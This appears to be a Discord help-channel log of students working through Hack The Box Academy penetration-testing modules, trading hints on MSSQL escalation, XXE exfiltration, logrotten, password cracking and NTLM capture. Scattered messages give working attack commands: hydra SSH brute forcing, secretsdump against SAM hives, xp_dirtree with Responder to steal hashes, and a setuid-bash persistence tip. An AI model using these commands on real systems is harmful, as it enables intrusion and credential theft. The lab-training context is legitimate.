Try changing the login type when logging into mssql

Did you try character injection?

Or maybe there's a higher privilege user with that password

Yes I tried

May I DM you ?

The webserver is not able to run all the files

Tried

Are you sure?

Check C:\users

You've tried windows Auth yeah?

Like I said you may need to use a higher privilege user 😉

Jep

Probably

My hint isn't a probably

Alright

I'm just trying to poke you into thinking critically about the info you have

Because currently you do have the info to get the answer

Yeah, we have alex, admin and public users on the server

And i found a important.txt on an another server with these credentials

Don't tell me. Try with the information I've poked you with and come back if that doesn't work

Looks like it was the credentials for the mysql bc the username was alrrady there when i open it

Mssql

Do not mix the two up

Don't spoil on others, but always try to authenticate to the system with the highest user you got

Sorry

You have all the info needed to escalate privileges

Iirc you can run mssql as admin

And you DO have the password

Thank you

7.5

What restrained your from rating it 10?

I'm working on the Blind Data Exfiltration section of the Web Attacks module. I've tried both of the methods in the section (manual and automated using XXEInjector). Neither method has worked for me so far. For the manual method, I start a PHP server on my attack box and forward the request from burp as shown in the section, and back in the terminal I see that there was an accepted request, but then I don't see anything else. I just see "CLOSING." For the XXEInjector approach, I get "Cannot resolve hostname." Does anyone have any tips?

in linux priv escal. logrotten, i have to contruct a different payload for the attack to work? beacuse i dont seem to get a reverse shell

Hey, anyone available to help with logrotten in linux privesc ? It doesn't seem to win the race condition

Hi! I just signed up for a paid account and am running into an issue. I already posted on the community chat but did not get an answer. I tried the support bot, but no luck. Can anyone help?

the support bot will help you with a real human when available

am stuck here too haha

@eager siren and I are both stuck while we think we pretty much did everything we could to exploit correctly the weakness, anyone has solved it to help us ?

sure shoot me a dm if y'all still need help with that

On the Citrix Breakout Win Priv Escalation module, I’m a little unsure on where to run smbserver.py from. On the module it’s being run from root@ubuntu but I’m pretty sure it needs to be from the initial target box. I’ve transferred it over to the initial Linux box and it still doesn’t appear to be working. I think the answer is probably in front of me but I can’t see it yet

Anyone able to nudge me please?

for the manual way you'll need to give us more than that for anyone to be able to help you like what did you try what work or didn't (say you started a php server and do exactly what the section show isn't really a good question) and for the automated tool at least give us what command did you use

yep you run the smbserver on the given linux machine

sudo /home/htb-student/.local/bin/smbserver.py -smb2support share /home/htb-student/Tools

Ahh I didn’t know it was in that folder! You’re a star, thank you ❤️

The hint is in the screen where it was in Tools folder if you look at the prompt

Totally missed that 🤦‍♂️ thanks!

I think that have proplem,I spended two days on this.

tldr; keep going, reset your box if necessary and you'll win the race condition once. Also use permanent privesc like || chmod +s /bin/bash || or || copying /etc/passwd, cat /root/flag.txt into a file etc || instead of revshell because the revshell won't last long

yeah,I solved it,I will finish the cpts

if you need help,please dm me

I already have the CPTS certification but thanks 🙂 I'm revisiting old modules that got updated

LOGIN BRUTE FORCING --> Service Authentication Brute Forcing -->Using what you learned in this section, try to brute force the SSH login of the user "b.gates" in the target server shown above. Then try to SSH into the server. You should find a flag in the home dir. What is the content of the flag?

I've brute forced the second account (m.gates)but i cant get the first one (b.gates) cracked.

cmd b.gates ||hydra -l b.gates -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-10.txt ssh://94.237.53.115:52965||
cmd m.gates ||hydra -l m.gates -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-10.txt ssh://94.237.53.115:52965||

What did i miss?

XDDDDDDD

Can't remember this one but the wordlist you're using is only the top 10 password, which might be a little light

Think i've misunderstood that i should use the short rock-you.txt and should be using a different method learned earlier in the module?

I think something new will be released soon 🤩

@silver mesa

Will be curious to see how that cert compares to the BTL1 cert

For this section you are supposed to use a custom wordlist like they had you create in the Personalized Wordlist section.

Yeah that makes sense, my apologies. I often find it difficult to strike the balance between giving enough for people to help me but not so much that it spoils anything for others. Sounds like I was way too tight-lipped this time. I just went through the exercise again and am getting a different error this time. I first intercepted a POST request to http://<TARGET_IP>/blind (filled out the form on the site and intercepted the post request with burp), deleted all code underneath <?xml version="1.0" encoding="UTF-8"?> and replaced the deleted code with XXEINJECT, copied the request and wrote it to a file called req.txt, then ran the following command: ruby XXEinjector.rb --host=127.0.0.1 --httpport=8000 --file=req.txt --path=/327a6c4304ad5938eaf0efb6cc3e53dc.php --oob=http --phpfilter I get the message "FTP/HTTP did not get response. XML parser cannot parse provided file or the application is not responsive."

This is the first time I saw a bunny CPTS certified.

Blue Teamers 🙌

I recommend you watch ippsec’s video on “book”, the logrotten exploit is used there

To you too

Hello guys, i'm in the PIVOTING odule, with the ICMP TUNNELING WITH SOCKS task

someone knows who i fix this error?

Did you think critically before you ran this?

doing "Password attacks - Passwd, Shadow & Opasswd" I've been waiting for the unshadowed hash to crack for several minutes

yeah

what abou it

pressed enter way too soon sorry about that

its oki mate

I found the back ups for the shadow and passwd file and I ran the unshadow command and I've been trying to crack that with hashcat

but it's taking forever

am I doing something wrong or I need to wait?

which wordlist you are using

if you want to dm i can try to help

rockyou.txt

use the one

in the resources

user.list

and password.list

ig

that was it, thanks

it worked

thats good

i'm in the pvt box

welcome anytime

Just have the same issue as @smoky viper , did use secretsdump but still have the same NT hash for all users, which when cracked gives an empty password 😢

The error is because it cant find the shared object. Recompile except statically

yes

hmmmm, i followed the modules steps, i'll try with another way

what cmnd u used

You dont need to try another way. you just need to statically compile the tool first

can you paste the command used?

not the whole output just the command

||impacket-secretsdump -sam ./SAM -system ./SYSTEM LOCAL||

Just the normal one ^^

done from pwnbox

going to dm you

A remainder the NTLM is LM:NT if LM is not used the first part it's empty "aad3c435b514a4eeaad3b935b51304f "

impacket is weird and often really wants you to put the : in front too

can i DM?

so much that Im tempted to make my own patch just to not

no thanks Im at work. you can ask follow up questions here

I think most of them are using only the first part of the hash "aad3c435b514a4eeaad3b935b51304f " 😅

? Im not disagreeing

Would you have the command there, please?

why not instead google how to compile statically for the language of the tool and learn something new and useful instead?

o

I asked here because I didn't understand the reason, I hadn't done it yet, but thanks for the help, I'm looking here

hello- so i wonder can you do CTF questions solo

Well Ive given you the vital clue you need to discover how to solve the issue, so now its on you.

This wont be the only time you see an error like this. youre going to have to learn how.

so just a question quesiton im triyng to join a team but it doesnt exist while it does exist

i’m assuming you’re talking on the main platform?

read #welcome and verify your account. then either go to #1024429874246590575 or use the support feature on the website

beat me to it

wait ctf and hackthebox dont have the same teams?

this channel is for academy module discussion only

no

oh sorry

edit: I think I found something, hint: enumerate more :) hey I'm currently trying the knowledge check for getting started, I know of the way to gain one that includes msfconsole, but I would like to find another. I thought I found one but the script errors out, any pointers/tips?

I'm looking for a small hint regarding the skill assessment in Whitebox Pentesting 101. I believe my payload should work but I can't quite wrap my head around why it doesn't.
@pine dagger : I see you finished the module. Would you be open to a DM? 🙂

ok so I managed to get to the admin console, but file upload doens't function, can anyone provide a tiny hint?

(@Coy I'd love to help but I haven't done that box sorry 😦 )

The box went offline as soon as I did that, so gonna retry and upgrade it

what box is that

getting started knowledge check

if you follow the same steps as that module you should be able to complete that box

I had to get a liiiiiittle more creative with how to transfer the shellcode to the webserver but I ended up finding a spot for it :)

Have a tty shell running as we speak :D

awesome

in hindsight, I should have enumerated the admin panel more

why is this command not giving me back any result

did you think critically before running this command?

Hi! What is the password for the "mssqlsvc" user? i know its done with Responder

IN the Attacking Common Services/SQL

but i cant capture anything

can somebody give a hint?

XD! im done for today wasnt even giving a fk about subnetworks

i just had to check at subdomains

not IPs

I was meming but glad you figured it out anyways

can somebody help pls?

it is driving me crazy

would help if you actually provided the commands you tried

i ran responder: sudo responder -I tun0
sqsh -S 10.129.203.12 -U htbdbuser -P 'MSSQLAccess01!' -h

im just in a hurry and want to end these questions :S

1> EXEC master..xp_dirtree ' \10.129.203.12\share\ '
2> GO

thats not enough slashes

also you provided the same IP as the target?

Did you think critically before you ran this?

in the sample the slashes were like this

yes i did

unc paths always start with double \ in windows

discord does not show the second slash

i did it with a double

gotcha

why did you use the target ip though

helpful to always use code blocks when sending commands - 1> EXEC master..xp_dirtree '\\10.129.203.12\\share\ '

?

Youre command is reaching the same server you connected to in your sqsh command

how do you expect responder to see it?

you need to specify the share as being on your box

i tried it with my ip too

did you try the other suggested sql command too?

https://i.imgur.com/CcP9x0C.png

working for me

try using mssqlclient, maybe sqsh is just being weird

isn't there supposed to be output after you execute the go line...?

should be yes but nothing happens

samba server is running on my end ofc

reset the target, or this

just for verification

i need to run responder, i need to run smb server on my end, and i need to execute those commands in mssql

this is the concept right?

you don't need Responder AND an SMB Server

choose one

"To make this work, we need first to start Responder or impacket-smbserver and execute one of the following SQL queries:"

than i dont understand

Responder and the SMB server will both catch the hash and print it to the terminal

your smb server is likely directly blocking responder from working lmao

i restarted everything

i ran impacket-smbserver

commands still not working

i dont consider myself stupid but this section of the module seem a bit unexplained

at least to me

stop running smbserver

just run responder